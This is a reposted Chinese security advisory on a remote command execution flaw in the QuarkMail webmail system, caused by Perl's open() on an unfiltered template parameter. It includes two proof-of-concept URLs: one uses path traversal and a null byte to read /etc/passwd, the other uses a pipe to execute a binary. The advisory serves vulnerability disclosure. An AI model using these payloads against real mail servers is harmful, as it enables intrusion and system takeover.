快客电邮(QuarkMail)远程命令执行漏洞

快客电邮(QuarkMail)远程命令执行漏洞,第1张

概述漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。 漏洞厂商:http://www.ipmotor.com/ 漏洞解析:QuarkMail错误地使用pe

漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。

漏洞厂商:http://www.ipmotor.com/

漏洞解析:QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。

漏洞证明:登录进入系统之后访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inBox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../etc/passwd%00&ID=2&sort=0&read_flag=yes

 

即可得到系统账户文件,访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inBox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/ID|%00&ID=2&sort=0&read_flag=yes

 

即可以将/usr/bin/ID文件打开执行,并且将结果返回,用户就可以利用一序列 *** 作获得系统的完整访问权。

漏洞解决:请等待官方补丁。

总结

以上是内存溢出为你收集整理的快客电邮(QuarkMail)远程命令执行漏洞全部内容,希望文章能够帮你解决快客电邮(QuarkMail)远程命令执行漏洞所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/1288737.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-06-09
下一篇 2022-06-09

发表评论

登录后才能评论

评论列表(0条)

保存